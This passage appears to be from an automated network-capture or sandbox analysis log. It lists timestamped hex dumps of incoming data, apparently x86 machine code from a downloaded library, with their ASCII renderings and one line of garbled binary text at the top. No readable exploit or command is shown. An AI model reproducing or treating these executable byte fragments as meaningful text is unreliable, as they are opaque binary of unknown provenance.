VLMF[_^[]WQMF5_^[]C8t!jhpVM_^[]SM,ICEEUPPEDjPPpE3u}03U$punEtqu
2023-11-18 09:02:40 UTC	2768	IN	Data Raw: 0c 5f c7 04 88 62 00 00 00 89 54 88 04 c7 44 88 08 01 00 00 00 c7 44 88 10 00 00 00 00 5e 8b e5 5d c3 cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 56 57 8b f9 8b c2 b1 20 89 44 24 10 88 4c 24 0f 8b 9f e4 00 00 00 85 db 0f 84 d1 00 00 00 0f bf 73 22 8b 43 04 c1 e6 04 83 c0 f0 03 f0 80 bf c8 00 00 00 01 75 13 68 bc b2 12 10 57 e8 e5 cc 04 00 83 c4 08 e9 a2 00 00 00 66 83 7e 0c 00 0f 87 87 00 00 00 8b 45 08 85 c0 74 48 8b 48 04 89 4c 24 14 83 f9 07 75 1b 51 ff 30 68 e8 b2 12 10 e8 92 ca 04 00 83 c4 0c 85 c0 74 24 8b 45 08 8b 4c 24 14 83 f9 06 75 54 51 ff 30 68 f0 b2 12 10 e8 72 ca 04 00 83 c4 0c 85 c0 75 40 b1 40 eb 08 8a 4c 24 0f 66 ff 4b 24 0f b6 c1 66 09 46 0e 0f b6 c1 09 43 1c f6 46 0e 01 74 09 8b d6 8b cf e8 73 04 00 00 ff 74 24 10 8b d3 8b cf 56 e8 85 1c 00 Data Ascii: _bTDD^]USVW D$L$s"CuhWf~EtHHL$uQ0ht$EL$uTQ0hru@@L$fK$fFCFtst$V
2023-11-18 09:02:40 UTC	2816	IN	Data Raw: 7b 51 8b d7 8b c8 e8 9a e6 f7 ff 8b f8 83 c4 04 eb 6c ff 74 24 18 8b 54 24 18 8b ce e8 34 08 fb ff 83 c4 04 85 c0 75 56 8d 44 24 24 33 d2 50 8d 44 24 20 8b ce 50 e8 2a e6 f7 ff 8b 5c 24 2c 83 c4 08 85 db 75 0f 8b 4e 10 8b 49 04 e8 c4 38 03 00 85 c0 7e 29 8b 4e 14 8b 46 10 c1 e1 04 83 c0 f0 03 c1 83 78 04 00 74 13 8b 4c 24 1c 8b d3 50 e8 30 e6 f7 ff 8b f8 83 c4 04 eb 02 33 ff ff 74 24 18 e8 3e f3 fa ff 83 c4 04 85 ff 75 43 80 7e 5b 00 75 07 8b ce e8 fa 65 03 00 83 66 18 ef f6 86 b4 00 00 00 04 c6 86 b0 00 00 00 00 75 0d 8d 54 24 0c 8b ce e8 db 2f fe ff 8b f8 80 7e 5b 00 75 07 8b ce e8 7c 65 03 00 85 ff 0f 84 ee 00 00 00 f6 86 b4 00 00 00 04 0f 85 99 00 00 00 8b 46 14 48 8b d8 89 44 24 24 8b 46 10 03 db 8b 4c d8 04 85 c9 74 1b e8 fb 3a 03 00 8b 46 10 c7 44 Data Ascii: {Qlt$T$4uVD$$3PD$ P*\$,uNI8~)NFxtL$P03t$>uC~[uefuT$/~[u\|eFHD$$FLt:FD
2023-11-18 09:02:40 UTC	2848	IN	Data Raw: 83 79 10 00 74 07 e8 8a 4e 02 00 eb 0d 0f 57 c0 66 0f 13 44 24 10 8b 44 24 10 8b 54 24 0c 89 44 24 1c 8b 87 78 01 00 00 89 44 24 10 c7 87 78 01 00 00 00 00 00 00 85 d2 0f 84 d0 00 00 00 8b 4c 24 08 85 c9 0f 84 c4 00 00 00 83 7c 24 1c 00 8b 47 20 89 44 24 08 74 0d 8b 47 24 81 67 20 ff ff ff 9f 89 47 24 ff 74 24 20 51 57 8d 4c 24 64 e8 31 1d 00 00 8b 4c 24 14 83 c4 0c 81 e1 00 00 00 60 09 4f 20 85 c0 75 58 8b 44 24 2c 85 c0 0f 85 94 00 00 00 8b 94 24 3c 01 00 00 85 d2 0f 84 85 00 00 00 80 7a 2b 02 75 7f 0f 57 c0 8d 44 24 58 0f 29 44 24 30 8d 4c 24 58 89 44 24 30 8d 44 24 30 0f 29 44 24 40 8b 52 2c 50 e8 c6 5b fd ff 83 c4 04 83 7c 24 7c 00 74 28 83 7c 24 64 00 74 21 8b 44 24 24 85 c0 74 19 8d 4c 24 58 8b d0 51 ff 76 0c 8b 4c 24 30 ff 76 08 e8 87 1e 00 00 83 Data Ascii: ytNWfD$D$T$D$xD$xL$\|$G D$tG$g G$t$ QWL$d1L$`O uXD$,$<z+uWD$X)D$0L$XD$0D$0)D$@R,P[\|$\|t(\|$dt!D$$tL$XQvL$0v
2023-11-18 09:02:40 UTC	2896	IN	Data Raw: 07 07 07 07 07 07 07 07 07 07 07 07 07 07 01 02 07 07 03 03 03 03 03 03 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 04 03 03 03 03 03 04 04 04 03 05 00 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 05 05 06 07 07 07 07 07 05 cc cc 55 8b ec 85 d2 74 29 66 0f 1f 84 00 00 00 00 00 8b 42 04 a9 00 10 04 00 74 16 a9 00 00 04 00 74 08 8b 42 14 8b 50 08 eb 03 8b 52 0c 85 d2 75 e0 85 c9 74 20 8b 41 04 a9 00 10 04 00 74 16 a9 00 00 04 00 74 08 8b 41 14 8b 48 08 eb 03 8b 49 0c 85 c9 75 e0 ff 75 08 52 8b d1 33 c9 e8 9f 00 00 00 83 c4 08 5d c3 cc cc cc cc Data Ascii: Ut)fBttBPRut AttAHIuuR3]
2023-11-18 09:02:40 UTC	2928	IN	Data Raw: 00 00 8b 47 2c c7 44 24 2c 00 00 00 00 c7 44 24 38 00 00 00 00 c7 44 24 30 00 00 00 00 8d 48 01 c7 44 24 34 00 00 00 00 03 c2 89 4c 24 28 89 47 2c 80 3e 89 75 29 8d 41 ff 89 4c 24 30 03 c2 89 54 24 34 50 51 8b 4c 24 14 ba 49 00 00 00 6a 00 c6 44 24 30 0a e8 8b ad 01 00 83 c4 0c eb 19 51 8b 4c 24 10 ba 46 00 00 00 6a 00 c6 44 24 2c 03 e8 40 ac 01 00 83 c4 08 83 7b 3c 00 ba 9a 00 00 00 6a 00 0f 84 89 00 00 00 8b 07 8d 4c 24 14 51 8b c8 89 44 24 20 c7 44 24 18 90 9d 12 10 c7 44 24 1c 01 00 00 00 e8 ca 37 00 00 8b c8 83 c4 08 89 4c 24 10 85 c9 74 3b c6 41 01 43 8b 4b 3c 8b 51 0c 85 d2 74 12 8b 4c 24 18 6a 00 6a 00 e8 f2 2a 00 00 83 c4 08 eb 02 33 c0 8b 4c 24 10 ba 34 00 00 00 51 50 8b cf e8 29 36 00 00 83 c4 08 89 44 24 10 8b 43 3c 8b 50 0c 85 d2 74 09 8b 4c Data Ascii: G,D$,D$8D$0HD$4L$(G,>u)AL$0T$4PQL$IjD$0QL$FjD$,@{<jL$QD$ D$D$7L$t;ACK<QtL$jj*3L$4QP)6D$C<PtL
2023-11-18 09:02:40 UTC	3744	IN	Data Raw: 89 8b 46 70 c7 04 88 13 00 00 00 89 54 88 04 89 54 88 08 c7 44 88 0c 00 00 00 00 c7 44 88 10 00 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 8a 1a 56 8b f1 57 80 fb af 75 76 8a c3 3a c3 75 03 8a 42 02 8b 7d 08 3c b0 75 07 8b 72 14 8b 06 eb 0c 3c 89 75 49 8b 72 14 8b 46 1c 8b 00 83 f8 01 7e 3c 80 fb 89 74 1d 80 7a 02 89 74 17 8d 04 bf 8b 4c 86 08 8b 45 10 89 08 8b 42 1c 03 c7 5f 5e 5b 59 5d c3 8b 46 1c 8d 0c bf 8b 4c 88 08 8b 45 10 89 08 8b 42 1c 03 c7 5f 5e 5b 59 5d c3 8b 45 10 8b ca 89 08 8b 42 1c 03 c7 5f 5e 5b 59 5d c3 80 fb 89 75 20 8b 42 14 8b 55 08 8b 40 1c 8d 0c 92 8b 4c 88 08 8b 45 10 89 08 8b 45 0c 03 c2 5f 5e 5b 59 5d c3 80 fb b0 75 25 8b 45 08 ff 75 14 8d 0c 80 8b 42 14 8b 54 88 08 8b ce 8b 45 10 89 10 e8 d4 90 Data Ascii: FpTTDD_^[]UQSVWuv:uB}<ur<uIrF~<tztLEB_^[Y]FLEB_^[Y]EB_^[Y]u BU@LEE_^[Y]u%EuBTE
2023-11-18 09:02:40 UTC	3760	IN	Data Raw: 74 32 b8 65 00 00 00 5e 8b e5 5d c3 8b 56 24 8b 42 04 89 46 24 c7 42 04 00 00 00 00 83 7e 28 00 75 05 e8 be 21 00 00 33 c9 b8 65 00 00 00 39 4e 24 0f 45 c1 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 51 56 8b 71 30 33 c0 57 8b fa 38 46 38 75 20 39 46 24 8d 56 24 74 0e 8d 4e 40 89 07 e8 4f 17 00 00 5f 5e 59 c3 c7 07 01 00 00 00 5f 5e 59 c3 8b ce e8 2a 10 00 00 8b d0 8b ce e8 01 20 00 00 85 c0 75 0d 8b ce e8 16 00 00 00 c7 07 00 00 00 00 5f 5e 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 14 53 8b d9 c7 45 fc 00 00 00 00 56 57 8b 43 48 8b 40 18 89 45 f4 8a 43 3c 3c 01 75 07 be c0 b6 0d 10 eb 0f 3c 02 be 10 b9 0d 10 b9 e0 b7 0d 10 0f 44 f1 33 c9 38 4b 3b 76 11 8d 53 60 89 32 8d 52 48 0f b6 43 3b 41 3b c8 7c f2 8d 55 fc 8b cb e8 f6 01 00 00 Data Ascii: t2e^]V$BF$B~(u!3e9N$E^]QVq03W8F8u 9F$V$tN@O_^Y_^Y* u_^YUSEVWCH@EC<<u<D38K;vS`2RHC;A;\|U
2023-11-18 09:02:40 UTC	3776	IN	Data Raw: 04 80 ff 74 c3 04 ff 34 c3 8b 42 08 8d 04 80 8d 0c c3 e8 de 08 01 00 8b 75 ec 83 c4 08 8b 4d e8 83 c6 14 8b 45 e4 8b 95 6c ff ff ff e9 a4 f9 ff ff 8b 55 ec 8b 4d d8 8b 42 04 8d 04 80 8d 1c c1 8b 42 08 8d 04 80 8d 34 c1 8b 42 0c 8d 04 80 8d 3c c1 0f b7 4b 08 8a 46 08 0a c1 89 4d c8 a8 01 74 21 8b cf e8 7c 09 01 00 8b 75 ec 8b 7d e0 83 c6 14 8b 4d e8 8b 45 e4 8b 95 6c ff ff ff e9 52 f9 ff ff f6 c1 12 75 2b 8a 55 b0 8b cb 6a 00 e8 21 10 01 00 83 c4 04 85 c0 0f 85 a9 54 00 00 66 8b 43 08 b9 fd ff 00 00 66 23 c1 0f b7 c8 89 4d c8 eb 29 f7 c1 00 40 00 00 74 21 8b cb e8 b3 10 01 00 85 c0 0f 85 7e 54 00 00 66 8b 43 08 b9 fd ff 00 00 66 23 c1 0f b7 c0 89 45 c8 0f b7 46 08 89 45 d4 a8 12 75 11 8a 55 b0 8b ce 6a 00 e8 c2 0f 01 00 83 c4 04 eb 0e a9 00 40 00 00 74 21 Data Ascii: t4BuMElUMBB4B<KFMt!\|u}MElRu+Uj!TfCf#M)@t!~TfCf#EFEuUj@t!
2023-11-18 09:02:40 UTC	4643	IN	Data Raw: 00 00 00 8b 45 ec 8b 50 04 8b ca 8b 47 10 03 c9 8b 44 c8 0c 8b 00 3b 85 40 ff ff ff 74 07 8b cf e8 98 40 fe ff 8b 86 a0 00 00 00 ba 11 00 00 00 83 e0 fd 89 55 dc 83 c8 01 89 86 a0 00 00 00 e9 2b 39 00 00 8b 55 ec 8d 85 f0 fe ff ff 8b 4f 10 50 8b 42 04 8b 52 0c 03 c0 8b 4c c1 04 e8 eb 1b 01 00 8b 55 ec 83 c4 04 8b 4d e8 e8 3d 3e 00 00 8b c8 8b 85 f0 fe ff ff e9 65 dd ff ff 8b 55 ec 8b 72 04 ff 72 0c 8b 52 08 c1 e6 04 03 77 10 8b 4e 04 e8 e6 1a 01 00 8b d0 83 c4 04 8b 45 ec 89 55 dc 8b 40 08 83 f8 01 75 1a 8b 45 ec 8b 4d ec 0f b7 40 02 8b 49 0c 2b c8 8b 46 0c 89 08 83 4f 18 01 eb 11 83 f8 02 75 0c 8b 45 ec 8b 4e 0c 8a 40 0c 88 41 4c 8b 75 ec 83 7e 04 01 75 18 33 d2 8b cf e8 76 7e 00 00 8b 4d e8 8b 55 dc 83 a1 a0 00 00 00 fc eb 03 8b 4d e8 85 d2 0f 85 6b 38 Data Ascii: EPGD;@t@U+9UOPBRLUM=>eUrrRwNEU@uEM@I+FOuEN@ALu~u3v~MUMk8
2023-11-18 09:02:40 UTC	4675	IN	Data Raw: a8 08 75 10 a8 02 74 3a ba 01 00 00 00 5e 5d e9 29 01 00 00 5e 5d e9 e2 ae 00 00 80 fa 42 75 22 0f b7 46 08 a8 02 75 11 a8 2c 74 0d 8a 55 08 6a 01 e8 57 b2 00 00 83 c4 04 b8 d3 ff 00 00 66 21 46 08 5e 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 56 8b 75 08 0f b7 46 08 83 e0 3f 0f b6 80 38 bc 13 10 83 f8 03 75 66 8a 46 0a 8d 54 24 08 8b 4e 10 88 44 24 08 ff 74 24 08 ff 76 0c e8 56 a7 02 00 83 c4 08 85 c0 7e 37 83 f8 01 75 1a f2 0f 10 54 24 08 8b d6 8b ce e8 2b 01 00 00 85 c0 74 07 66 83 4e 08 04 eb 0f f2 0f 10 44 24 08 66 83 4e 08 08 f2 0f 11 06 b8 fd ff 00 00 66 21 46 08 0f b7 46 08 83 e0 3f 0f b6 80 38 bc 13 10 5e 8b e5 5d c3 cc cc cc cc cc 55 8b ec 56 8b f1 80 fa 43 7c 23 0f b7 46 08 a8 04 75 42 a8 08 75 10 a8 02 74 3a ba 01 00 00 00 5e 5d Data Ascii: ut:^])^]Bu"Fu,tUjWf!F^]UVuF?8ufFT$ND$t$vV~7uT$+tfND$fNf!FF?8^]UVC\|#FuBut:^]
2023-11-18 09:02:40 UTC	4755	IN	Data Raw: 50 e8 47 64 00 00 83 c4 04 85 c0 75 63 8b 55 e8 8b 4d e4 50 ff 75 08 e8 b1 05 00 00 8b 4d 0c 83 c4 08 f7 45 e0 00 24 00 00 89 01 75 06 83 7d f0 00 74 08 8d 4d d8 e8 e2 70 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 45 0c 68 74 09 13 10 68 98 49 01 00 68 38 e3 12 10 68 1c e3 12 10 6a 0b c7 00 00 00 00 00 e8 f5 7c 02 00 83 c4 14 b8 0b 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 83 ec 60 53 8b da 56 8b f1 89 5d f8 57 8b cb e8 e9 fe 00 00 0f b7 4b 30 33 c0 8b 7b 2c 8b 5b 28 89 75 ec 8b 75 f8 66 89 45 d4 89 45 e4 8b 46 74 8b 40 3c 2b c3 3b c8 7e 09 33 d2 8b c8 85 c0 0f 48 ca 89 5d dc 3b f9 77 0e b8 10 10 00 00 89 7d d8 66 89 45 d4 eb 1f 8d 45 cc 33 d2 50 57 8b ce e8 c8 63 00 00 83 c4 08 85 c0 0f 85 cd 00 00 00 8b 5d dc 8b 7d d8 0f b6 33 89 75 f8 81 fe 80 Data Ascii: PGducUMPuME$u}tMp3_^[]EhthIh8hj\|_^[]U`SV]WK03{,[(uufEEFt@<+;~3H];w}fEE3PWc]}3u
2023-11-18 09:02:40 UTC	4835	IN	Data Raw: 81 e0 00 00 00 0f 95 c0 c3 cc cc cc cc 8b 81 e0 00 00 00 89 42 18 89 91 e0 00 00 00 c3 55 8b ec 53 56 57 8b fa 8b d9 85 ff 0f 84 8f 00 00 00 8b 45 08 8d 04 80 8d 70 fb 8d 34 b7 3b f7 72 1e 8a 46 01 3c f9 7f 10 ff 76 10 0f be d0 8b cb e8 7a 00 00 00 83 c4 04 83 ee 14 3b f7 73 e2 85 db 74 54 83 bb 20 02 00 00 00 74 0d 8b d7 8b cb 5f 5e 5b 5d e9 c6 68 02 00 3b bb 74 01 00 00 73 36 3b bb 6c 01 00 00 72 13 8b 83 68 01 00 00 89 07 89 bb 68 01 00 00 5f 5e 5b 5d c3 3b bb 70 01 00 00 72 13 8b 83 60 01 00 00 89 07 89 bb 60 01 00 00 5f 5e 5b 5d c3 57 e8 d2 68 02 00 83 c4 04 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 83 c2 11 83 fa 0a 77 76 ff 24 95 e8 b1 0e 10 8b 55 08 e8 a5 00 00 00 59 5d c3 8b 55 08 85 d2 74 5d e8 f6 67 02 00 59 5d c3 83 b9 20 02 00 Data Ascii: BUSVWEp4;rF<vz;stT t_^[]h;ts6;lrhh_^[];pr``_^[]Wh_^[]UQwv$UY]Ut]gY]
2023-11-18 09:02:40 UTC	4922	IN	Data Raw: 8b 03 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 67 ff ff ff 8b 4c 24 34 39 4c 24 44 7c 1e 7f 0a 8b 44 24 10 39 44 24 40 76 12 8b 03 51 ff 74 24 14 8b 40 10 53 ff d0 83 c4 0c 8b f0 85 f6 0f 85 37 ff ff ff 8b 54 24 0c 8b 42 40 8b 08 85 c9 75 05 8d 46 0c eb 11 6a 00 6a 15 50 8b 41 28 ff d0 8b 54 24 18 83 c4 0c 33 f6 83 f8 0c 0f 45 f0 85 f6 75 26 80 7a 07 00 75 20 0f b6 4a 0a 8b 52 40 85 c9 74 13 8b 02 51 52 8b 40 14 ff d0 8b 5d 08 83 c4 08 8b f0 eb 1e 33 f6 8b 5d 08 eb 17 8b 44 24 0c 33 d2 6a 00 8b c8 89 78 1c e8 dd 0e 01 00 83 c4 04 8b f0 85 f6 0f 85 c1 fe ff ff 8b 4b 04 33 d2 e8 e6 85 00 00 8b f0 b8 65 00 00 00 85 f6 0f 44 f0 e9 a6 fe ff ff cc cc cc cc cc 8b 41 18 8b 40 04 8b 10 8b 42 60 89 41 2c 89 4a 60 c7 41 28 01 00 00 00 c3 cc cc cc cc cc cc cc 55 8b Data Ascii: @gL$49L$D\|D$9D$@vQt$@S7T$B@uFjjPA(T$3Eu&zu JR@tQR@]3]D$3jxK3eDA@B`A,J`A(U
2023-11-18 09:02:40 UTC	4970	IN	Data Raw: 8c 28 ff ff ff 8b 44 24 78 8b 74 24 44 89 44 24 14 8b 44 24 10 c7 44 24 18 00 00 00 00 8b c8 89 4c 24 38 85 c0 0f 8e 89 02 00 00 8b 54 24 70 8d 84 24 e4 00 00 00 33 db bf 01 00 00 00 83 e8 04 89 7c 24 2c 89 44 24 50 0f 1f 44 00 00 39 b4 1c d0 00 00 00 0f 8e 67 01 00 00 0f 1f 00 3b f9 7c 22 8d 4f 01 89 4c 24 38 83 f9 05 0f 8f 3c 03 00 00 c7 84 1c d4 00 00 00 00 00 00 00 89 94 1c e8 00 00 00 8b b4 1c e4 00 00 00 8b 4c 24 7c 8d 7e ff 0f b7 04 79 66 85 c0 75 12 8b d7 8d 4c 24 70 e8 18 1a 00 00 8b 4c 24 7c 0f b7 c0 0f b7 c0 83 c0 02 29 84 1c d0 00 00 00 83 7c 24 30 00 0f 85 d2 00 00 00 3b 74 24 70 0f 8d c6 00 00 00 0f b7 04 71 66 85 c0 75 0e 8b d6 8d 4c 24 70 e8 db 19 00 00 0f b7 c0 0f b7 c0 83 c0 02 e9 a6 00 00 00 68 74 09 13 10 68 bc 1f 01 00 68 38 e3 12 10 Data Ascii: (D$xt$DD$D$D$L$8T$p$3\|$,D$PD9g;\|"OL$8<L$\|~yfuL$pL$\|)\|$0;t$pqfuL$phthh8
2023-11-18 09:02:40 UTC	5050	IN	Data Raw: 3b c7 74 08 8b c8 85 c9 75 f3 eb 06 8b 47 18 89 41 18 8b cf e8 54 43 00 00 80 7b 14 00 75 30 8b 4b 0c 85 c9 74 29 c7 43 0c 00 00 00 00 8b 49 48 8b 41 14 89 45 fc e8 b2 00 01 00 8b 4d fc 8b 81 f4 00 00 00 83 78 0c 00 75 05 e8 ee ca 00 00 ff 77 0c e8 36 a9 01 00 83 c4 04 ff 77 10 e8 2b a9 01 00 83 c4 04 f6 43 10 04 74 1d 83 7b 08 00 75 17 8b ce e8 55 1d 00 00 c7 47 08 00 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 80 7e 09 00 74 0d 83 46 0c ff 75 07 8b ce e8 02 49 00 00 c7 47 08 00 00 00 00 5f 5e 33 c0 5b 8b e5 5d c3 cc cc 0f 57 c0 0f 11 01 c7 41 10 00 00 00 00 c3 cc cc b8 c8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 57 8b fa 80 7e 09 00 74 3f ff 46 0c 80 7e 0a 00 75 05 e8 f2 47 00 00 ff 75 10 8b d7 8b ce ff 75 0c ff 75 08 e8 90 00 00 00 83 c4 Data Ascii: ;tuGATC{u0Kt)CIHAEMxuw6w+Ct{uUG3_^[]~tFuIG_^3[]WAUQVW~t?F~uGuuu
2023-11-18 09:02:40 UTC	5130	IN	Data Raw: c6 06 01 a1 c8 23 14 10 85 c0 74 1b 68 9a 01 00 00 ff d0 83 c4 04 85 c0 74 0d bf 0a 00 00 00 8b c7 5f 5e 8b e5 5d c3 8b 56 10 8d 44 24 0c 50 6a 00 ff 76 3c 8b ce ff 76 38 e8 3f 00 00 00 8b f8 83 c4 10 85 ff 75 27 ff 76 10 e8 3e 69 01 00 8b 44 24 10 83 c4 04 89 7e 10 85 c0 74 03 89 46 04 83 7e 04 00 74 08 80 3e 00 75 03 c6 06 02 8b c7 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 51 53 8b c2 8b d9 89 45 fc 56 57 85 c0 0f 84 d2 00 00 00 8b 7b 70 6a 00 0f b7 47 06 8b 4f 0c 8d 04 80 8d 04 c5 38 00 00 00 50 85 c9 74 07 e8 ca 63 01 00 eb 05 e8 63 6a 01 00 8b f0 83 c4 08 85 f6 0f 84 92 00 00 00 8b 55 08 8d 46 10 89 46 04 8b cf 89 3e 66 8b 47 06 56 ff 75 fc 66 40 66 89 46 08 e8 f6 d0 fe ff 0f b7 46 08 83 c4 08 66 85 c0 74 2d 66 3b 47 08 77 27 ff 75 14 8b d6 8b Data Ascii: #tht_^]VD$Pjv<v8?u'v>iD$~tF~t>u_^]UQSEVW{pjGO8PtccjUFF>fGVuf@fFFft-f;Gw'u
2023-11-18 09:02:40 UTC	5210	IN	Data Raw: 5f 89 30 5e 5b 5d c3 cc cc cc cc cc cc 8b 41 20 8b 00 c3 cc cc cc cc cc cc cc cc cc cc 8b 41 20 8b 00 83 c0 60 c3 cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 39 51 18 7e 11 8b 41 20 8b 04 90 89 06 85 c0 74 05 33 c0 5e 5d c3 56 e8 0d 00 00 00 83 c4 04 5e 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 08 53 56 57 8b f9 8b da 89 5d f8 39 5f 18 7f 50 8b 4f 20 8d 04 9d 04 00 00 00 6a 00 50 e8 99 26 01 00 8b f0 83 c4 08 85 f6 75 0f 8b 45 08 89 30 8d 46 07 5f 5e 5b 8b e5 5d c3 8b 4f 18 8b c3 2b c1 8d 04 85 04 00 00 00 50 8d 04 8e 6a 00 50 e8 47 36 f0 ff 8d 43 01 89 77 20 83 c4 0c 89 47 18 80 7f 2b 02 0f 85 95 00 00 00 83 3d c8 22 14 10 00 74 3a a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 8d 55 fc b9 00 80 00 00 e8 98 2a 01 00 a1 e8 41 14 10 85 c0 74 0c 50 Data Ascii: _0^[]A A `UVu9Q~A t3^]V^]USVW]9_PO jP&uE0F_^[]O+PjPG6Cw G+="t:AtP#U*AtP
2023-11-18 09:02:40 UTC	5290	IN	Data Raw: 29 8b 75 d0 8b d3 2b 75 e4 8b 8f a8 00 00 00 1b 55 e0 83 c1 08 8b 87 ac 00 00 00 83 d0 00 50 51 52 56 e8 e6 20 f1 ff 89 45 fc 8b 87 9c 00 00 00 8d 77 50 39 06 75 22 83 7e 04 00 75 1c 8b 5d f0 8b cf 8b d3 e8 94 02 00 00 8b f0 85 f6 0f 85 ce 00 00 00 89 5f 1c 8d 77 50 33 db 39 5d fc 76 56 83 7d e8 00 74 2c ff 47 6c 8b 47 60 85 c0 74 0e c7 40 10 01 00 00 00 8b 40 2c 85 c0 75 f2 8b 8f f4 00 00 00 33 d2 e8 a2 3c 00 00 c7 45 e8 00 00 00 00 6a 00 6a 01 6a 00 8b d6 8b cf e8 bc 05 00 00 8b f0 83 c4 0c 85 f6 75 55 ff 45 f8 8d 77 50 43 3b 5d fc 72 aa 8b 45 d4 8d 77 50 8b 55 f4 8d 4d f0 51 8d 4d fc 51 50 ff 75 d0 8b cf e8 0b 16 00 00 83 c4 10 85 c0 0f 84 c0 fe ff ff 8b 5d f8 33 f6 83 f8 65 0f 45 f0 85 f6 75 38 6a ff 8d 55 dc 8b cf e8 35 f2 ff ff 83 c4 04 8b f0 eb 25 Data Ascii: )u+uUPQRV EwP9u"~u]_wP39]vV}t,GlG`t@@,u3<EjjjuUEwPC;]rEwPUMQMQPu]3eEu8jU5%
2023-11-18 09:02:40 UTC	5354	IN	Data Raw: 5e 75 19 8b 41 0c 80 78 20 00 74 10 6a 00 ff 31 ff 70 2c ff 15 4c 23 14 10 83 c4 0c c3 0f b7 41 1c a8 11 74 4a 25 ef ff 00 00 66 89 41 1c a8 01 74 3d 83 f0 03 c7 41 24 00 00 00 00 66 89 41 1c 8b 41 0c 8b 10 89 51 20 85 d2 74 05 89 4a 24 eb 0d 80 78 20 00 89 48 04 74 04 c6 40 21 01 83 78 08 00 89 08 75 09 f6 41 1c 08 75 03 89 48 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc f6 41 1c 02 74 3b 8b 51 0c 39 4a 08 75 06 8b 41 24 89 42 08 8b 41 24 56 8b 71 20 85 f6 74 05 89 46 24 eb 03 89 42 04 8b 71 24 8b 41 20 85 f6 74 05 89 46 20 eb 0a 89 02 85 c0 75 04 c6 42 21 02 5e 8b 41 0c 6a 01 ff 48 0c 8b 41 0c ff 31 ff 70 2c ff 15 4c 23 14 10 83 c4 0c c3 cc cc cc cc cc 8b 41 0c 66 ff 41 1e ff 40 0c c3 cc cc cc cc cc 8b 41 0c ff 48 0c 66 83 41 1e ff 0f 85 8e 00 00 00 f6 Data Ascii: ^uAx tj1p,L#AtJ%fAt=A$fAAQ tJ$x Ht@!xuAuHAt;Q9JuA$BA$Vq tF$Bq$A tF uB!^AjHA1p,L#AfA@AHfA
2023-11-18 09:02:40 UTC	5460	IN	Data Raw: 00 00 ff 73 1c 89 43 14 8b d0 68 c4 8c 12 10 b9 0a 06 00 00 e8 54 05 00 00 83 c4 0c 89 44 24 14 85 c0 75 3d 85 ff 7c 39 7f 04 85 f6 74 33 3b 7c 24 0c 7c 21 7f 06 3b 74 24 10 76 19 6a ff 6a ff 8b cb e8 a6 e7 ff ff 8b 44 24 1c 83 c4 08 5f 5e 5b 8b e5 5d c3 57 56 8b cb e8 8f e7 ff ff 83 c4 08 8b 44 24 14 5f 5e 5b 8b e5 5d c3 cc 55 8b ec 83 ec 14 8b 45 14 0f 57 c0 53 8b 5d 18 8b cb 56 8b 75 10 81 e1 ff ff ff 7f 0f 11 45 ec 89 45 10 89 45 f4 8b c3 57 33 ff c1 f8 1f 89 7d fc 89 4d f8 85 f6 0f 8e d5 00 00 00 8b 45 0c 90 8d 4d ec 51 8d 4d 18 51 56 50 8b 45 08 ff 70 08 ff 15 90 1f 14 10 85 c0 75 51 ff 15 ec 1d 14 10 3b 3d dc 19 14 10 0f 8d b4 00 00 00 83 f8 05 74 24 83 f8 20 74 1f 83 f8 21 74 1a 83 f8 37 74 15 83 f8 40 74 10 83 f8 79 74 0b 3d cf 04 00 00 0f 85 8b Data Ascii: sChTD$u=\|9t3;\|$\|!;t$vjjD$_^[]WVD$_^[]UEWS]VuEEEW3}MEMQMQVPEpuQ;=t$ t!t7t@tyt=
2023-11-18 09:02:40 UTC	5540	IN	Data Raw: 4c 24 0c 8b c1 8b 4c 24 6c 5f 5e 33 cc e8 17 21 ef ff 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8d 45 10 8b 4d 08 50 e8 0e 00 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 68 a1 04 10 14 10 33 c4 89 44 24 64 56 8b 75 08 8d 44 24 1c 57 8b f9 89 44 24 0c 56 52 89 7c 24 10 8b 47 78 89 44 24 1c 8d 44 24 10 50 c7 44 24 1c 46 00 00 00 c7 44 24 24 00 00 00 00 66 c7 44 24 28 00 01 e8 cf 06 00 00 8b 4c 24 18 83 c4 0c 85 c9 74 27 8b 44 24 18 c6 04 08 00 83 7c 24 14 00 76 14 f6 44 24 1d 04 75 0d 8d 4c 24 08 e8 55 03 00 00 8b c8 eb 04 8b 4c 24 0c 80 7c 24 1c 07 75 43 80 7f 53 00 75 3d 80 7f 54 00 75 37 83 bf c8 00 00 00 00 c6 47 53 01 7e 0a c7 87 38 01 00 00 01 00 00 00 ff 87 40 01 00 00 33 c0 66 89 87 44 01 00 00 8b 87 0c 01 00 00 Data Ascii: L$L$l_^3!]UUEMP]Uh3D$dVuD$WD$VR\|$GxD$D$PD$FD$$fD$(L$t'D$\|$vD$uL$UL$\|$uCSu=Tu7GS~8@3fD
